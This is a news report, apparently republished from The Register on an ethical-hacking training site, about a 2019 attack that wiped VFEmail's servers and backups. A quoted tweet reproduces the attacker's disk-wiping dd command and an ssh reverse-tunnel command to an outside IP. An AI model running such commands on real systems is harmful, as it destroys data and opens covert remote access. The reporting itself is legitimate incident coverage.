Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: The Register
A hacker wiped every server and backup of VFEmail this week in a “catastrophic” attack, according to the webmail service.
VFEmail admins detailed the network intrusion on Monday in a grim red-letter update on the site’s front page. The service’s founder Rick Romero also said it’s likely the webmail outfit is toast as a result of the ransacking:
Yes, @VFEmail is effectively gone. It will likely not return.
I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.— Havokmon (@Havokmon) February 12, 2019
While the website is once again up and running for paid users, it appears that, at least for all US customers, all their inboxes are empty, cleared out by one or more miscreants. “We have suffered catastrophic destruction at the hands of a hacker,” the site’s admins said. “This person has destroyed all data in the US, both primary and backup systems.”
Netizens who log in now will be able to send and receive mails, though all their old and archived messages are gone, as are any custom filters put in place to catch malware and spam. Free accounts remain unable to send email.
This is particularly bad, as the ability to scan messages for junk and software nasties was a key selling point of the service, which was set up in response to the ILoveYou virus that spread via email in 2001.
The tragedy unfolded on VFEmail’s Twitter feed as admins provided real-time updates on the disaster over the course of a day:
This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.
— VFEmail.net (@VFEmail) February 11, 2019
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N— VFEmail.net (@VFEmail) February 11, 2019
Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.
— VFEmail.net (@VFEmail) February 11, 2019
Interestingly, as VFEmail noted, there was no indication that the hacker had warned or contacted the site for any sort of ransom or demand before the attack happened, suggesting the point all along was to completely wipe out the webmail service.
We’ve asked VFEmail for more details, and will share them when/if they come in.
www.extremehacking.org
Sadik Shaikh | Cyber Suraksha Abhiyan, Ethical Hacking Training Institute, CEHv10,CHFI,ECSAv10,CAST,ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v10 course in Pune-India, ceh certification in pune-India, ceh v10 training in Pune-India, Ethical Hacking Course in Pune-India